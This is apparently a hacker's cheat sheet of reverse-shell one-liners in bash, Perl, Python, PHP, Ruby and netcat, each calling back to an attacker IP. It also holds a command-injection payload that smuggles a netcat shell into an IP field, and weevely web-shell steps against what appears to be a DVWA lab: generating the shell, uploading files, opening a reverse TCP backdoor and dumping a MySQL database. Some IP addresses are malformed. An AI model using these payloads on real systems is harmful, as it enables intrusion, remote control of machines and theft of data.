The following examples assums the hacker IP is 10.20.14 and use port 8080 for the connection.
Therefore in all f these cases you need to listen for port 8080 using the foolowing command
nc -vv -l -p 8080


BASH
bash -i >& /dev/tcp/10.20.14.203/8080 0>&1

PERL
perl -e 'use Socket;$i="10.20.14";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.20.14",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP
php -r '$sock=fsockopen("10.20.14",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby
ruby -rsocket -e'f=TCPSocket.open("10.20.14",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat
nc -e /bin/sh 10.20.14 8080


passthru("nc -e /bin/sh 192.168.175.35 8888");


1.1.1.1; nc -e /bin/sh 192.168.225.35 8888

weevely generate 123456 shell.php

weevely http://192.168.225.50/dvwa/vulnerabilities/shell.php 123456

:system_info
:help
:autdit_passwd
:shell_sh pwd
:shell_sh -h
:shell_sh -v passthru whoami
file_download -h


from dav
file_upload -h
file_upload /root/shell.txt ./test-shell-uploaded.txt
###look_file_location###
http://192.168.199.50/dav/test-shell-uploaded.txt

###backdoor_reversetcp###
backdoor_reversetcp -vector netcat 192.168.199.35 8080

cd ../dvwa
###sql_dump### -h
*sql_dump -host localhost -lpath /root/dvwa-data.txt dvwa root ''
*sql_dump -vector mysqldump_sh -host localhost -lpath /root/dvwa-data.txt dvwa root ''